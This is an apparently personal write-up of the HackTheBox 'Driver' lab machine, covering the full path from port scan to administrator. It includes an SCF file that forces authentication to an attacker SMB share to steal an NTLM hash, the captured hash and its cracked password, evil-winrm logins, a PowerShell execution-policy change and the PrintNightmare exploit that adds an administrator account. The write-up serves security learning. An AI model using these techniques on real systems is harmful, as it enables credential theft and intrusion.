Driver - HackTheBox

 

Driver Machine(10.10.11.106)

This was an easy windows machine with a chance to explore printnightmare vulnerability and abusing file upload vulnerability to capture NTLM hash of a user whom we force to authenticate to our server.

Recon

on port scan we get 4 open ports

22/tcp   filtered ssh
80/tcp   open     http         Microsoft IIS httpd 10.0
| http-auth: 
| HTTP/1.1 401 Unauthorized\x0D
|_  Basic realm=MFP Firmware Update Center. Please enter password for admin
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
135/tcp  open     msrpc        Microsoft Windows RPC
445/tcp  open     microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
5985/tcp open     http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: Host: DRIVER; OS: Windows; CPE: cpe:/o:microsoft:window

As scan says port 80 is running windows IIS server. Port 135 is MSRPC and port 445 is running smb. Port 5985 is winrm consider it as ssh of windows to login into remote computer and run commands on it. We will use evil-winrm tool, a pentest tool which support features like file upload/download, powershell and bash syntax also, which also utilizes winrm to login.

Directory and file fuzzing doesn't reveal much other than images and index.php which also gives 401 or 403 error. As it's using HTTP Basic Authentication which force user to authenticate themselves before making http request.

On Correct login it's set's a Authorization header for future request which have base64 encoded username & pasword.

As we don't have any creds. let's move on to smb.

Foothold: Capturing NTLM hash by scf file upload

Smb anonymous login is not enabled so we can't list shares 

smbclient -L //10.10.11.106/

Let's enumerate smb version using metasploit's auxiliary/scanner/smb/smb_version/ module

It tells it using windows build 10240 and possibly smb version 3.1.1. Let's google that smb 3.1.1 exploit and we find cve_2020_0796 buffer overflow vulnerability all over the search. But every exploit said not vulnerable. At this point i was in rabbit hole. The thing was i didn't try to login with default credentials like admin:admin or admin:password.

So, we can authenticate with admin:admin.

Let's also add driver.htb to our hosts file. Also we got some firmware upload option here looks like this could be our way in.

After uploading any random file here we get this message

This file share could be hint towards smb, which is nothing but a fileshare. And manually looking into these files that could be something. So quick google search file upload exploit smb brings this blogpost about scf file upload attack. SCF files forces file explorer to execute it and when explorer try to open the share listed in it, it will authenticate against our server and we steal user's NTLM hash. Also quick search on ippsec.rocks brings this video about same attack. So it was pretty easy to understand from here and let's do it.

Creating our test scf file

[Shell]
Command=2
IconFile=\\10.10.16.5\share\pentestlab.ico
[Taskbar]
Command=ToggleDesktop

Let's capture hash with metasploit module auxiliary/server/capture/smb. Run msfconsole with sudo permission as listening on port 445 requires root privilege. Then submit test.scf file and instantly we got tony user's hash

hash:

tony::DRIVER:5e438a66f72aeb2a:ea87bc8d6aa9f67fc40c654c42befff4:010100000000000080df2adbef2ad801411c81cce0c256bd000000000200120061006e006f006e0079006d006f00750073000100120061006e006f006e0079006d006f00750073000400120061006e006f006e0079006d006f00750073000300120061006e006f006e0079006d006f00750073000700080080df2adbef2ad8010600040002000000080030003000000000000000000000000020000048d56dd3702ce694d4b7551a1faf2507f676bb328b0bdd210752be59f65ed9220a0010000000000000000000000000000000000009001e0063006900660073002f00310030002e00310030002e00310036002e003500000000000000000000000000

Let's crack this hash with hashcat in google colab server, we basically install hashcat and rockyou on colab and then crack it there you could do it on your own machine also. Colab notebook.

!hashcat/hashcat hash wordlists/rockyou.txt 

It crack it tony:liltony

Let's try to login with it to smb, and it works.

Let's check if we can login into system with it using evil-winrm.  

evil-winrm -i 10.10.11.106 -u tony -p liltony

We got user on machine.

Privilege escaltion: CVE-2021-1675 - PrintNightmare

After getting user started enumerating box with tips and trciks listed on internet in order to search something vulernable. Although it was in front of me but couldn't spot it. Then people from discord came to help, running winpeas we get that spoolsv service is running which is associated with printer spooler service. and it's vulnerable to printnightmare attack. In which printer gives grant full admin level privilege to any user. 

 

We will use exploit developed by johnhammond sir.

Exploit link: here

Clone the repo and then

1. Upload the powershell script to victim machine using evil-winrm upload CVE-2021-1675.ps1 .
2. Let's import this module/script to our session Import-Module .\cve-2021-1675.ps1. But it fails with following Execution-Policy error

now this is a security feature of powershell which doesn't allow any external malicious script to get loaded into current session. We would need to curcumvent that. Error also gives a URL link let's study that.

as per this we can change the execution policy

"On a Windows computer you can set an execution policy for the local computer, for the current user, or for a particular session. You can also use a Group Policy setting to set execution policies for computers and users."

There are different types of execution policy like strcited, unrestrcited, default, bypass etc. to specify what to do when somone tries to load script. Let's check our permissions.

Get-ExecutionPolicy : and we are restrcited, let's change that.

Set-ExecutionPolicy -ExecutionPolicy Unrestricted -Scope CurrentUser : It will set scope to unrestrcited for currentuser

Let's invoke the script now.

Now we can login with new creds. adm1n:P@ssw0rd. as it have added this user to Administrator group.

And we are admin on box, yeet!

 

Cleanup:

• Remove the powershell script from machine.
• Set execution policy back to restrcited Set-ExecutionPolicy -ExecutionPolicy Restricted -Scope CurrentUser
• Delete the adm1n user from machine. net user adm1n /delete

Edit: 

After seeing other people solution printnightmare wasn't main intended solution. It was part of bonus challenge to get root. The ricoh diriver was installed which was vulnerable to privilege escalation. Metasploit can be used to do that but in my case it always hanged or exploit completed but no session opened. 

 

----

Thank you for reading and feedbacks are welcome. Hoping to improve my windows hacking skills over coming months.

Twitter: Avinashkroy